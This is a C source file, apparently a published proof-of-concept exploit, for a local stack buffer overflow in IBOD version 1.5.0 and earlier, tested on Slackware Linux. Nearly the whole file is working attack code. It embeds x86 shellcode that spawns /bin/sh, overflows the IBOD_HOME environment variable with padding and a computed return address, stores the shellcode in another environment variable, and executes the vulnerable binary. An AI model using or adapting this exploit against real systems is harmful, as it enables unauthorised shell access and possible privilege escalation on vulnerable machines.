/* ibod_bof.c
 *
 * IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
 *
 * Tested in Slackware Linux 10.0
 *
 * by CoKi <coki@nosystem.com.ar>
 * No System Group - http://www.nosystem.com.ar
 */

#include <stdio.h>
#include <strings.h>

#define BUFFER 540 + 4

char shellcode[]=
	"\x31\xc0"                         /* xor %eax,%eax    */
	"\x31\xd2"                         /* xor %edx,%edx    */
	"\x52"                             /* push %edx        */
	"\x68\x2f\x2f\x73\x68"             /* push $0x68732f2f */
	"\x68\x2f\x62\x69\x6e"             /* push $0x6e69622f */
	"\x89\xe3"                         /* movl %esp,%ebx   */
	"\x52"                             /* push %edx        */
	"\x53"                             /* push %ebx        */
	"\x89\xe1"                         /* movl %esp,%ecx   */
	"\xb0\x0b"                         /* mov $0xb,%al     */
	"\xcd\x80";                        /* int $0x80        */

void use(char *program);

int main(int argc, char *argv[]) {

	FILE *file;
	char buf[BUFFER], *path, tmp[BUFFER];
	char *buffer=buf;
	int ret;

	if(argc != 2) use(argv[0]);
	
	path = argv[1];

	if((file = fopen(path, "r")) == NULL) {
		printf(" Failed to open file!\n");
		exit(1);
	}

	ret = 0xbffffffa - strlen(shellcode) - strlen(path);
	
	bzero(buf, sizeof(buf));
	memset(buffer, 'A', BUFFER-4);

	sprintf(tmp, "%s", &ret);
	strncat(buf, tmp, 4);

	printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi <coki@nosystem.com.ar>\n\n");

	setenv("IBOD_HOME", buf, 1);
	setenv("SHELLCODE", shellcode, 1);

	execl(path, path, NULL);

}

void use(char *program) {
	printf(" Use: %s <path>\n", program);
	exit(1);
}